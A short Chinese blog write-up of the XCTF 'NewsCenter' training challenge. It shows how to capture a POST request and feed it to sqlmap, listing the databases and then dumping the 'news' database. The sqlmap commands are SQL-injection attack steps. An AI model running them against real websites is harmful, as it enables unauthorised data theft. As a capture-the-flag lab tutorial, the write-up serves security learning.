题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1

我们进入页面

XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法
首先我们页面的post请求进行抓包操作 随便输入一点内容

XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
这就是我们抓下来的包了 将这些保存为1.txt 放到sqlmap中去跑
输入命令:python sqlmap.py -r 1.txt --dbs

XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
对new在进行**
输入命令:python sqlmap.py -r 1.txt -D news --dump

XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
sqlmap注入演示完毕

相关文章:

  • 2021-12-03
  • 2021-08-27
  • 2021-12-16
  • 2022-12-23
  • 2021-11-17
  • 2022-02-07
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2021-04-07
  • 2021-10-12
  • 2022-01-22
  • 2022-01-09
  • 2021-07-25
  • 2021-10-15
相关资源
相似解决方案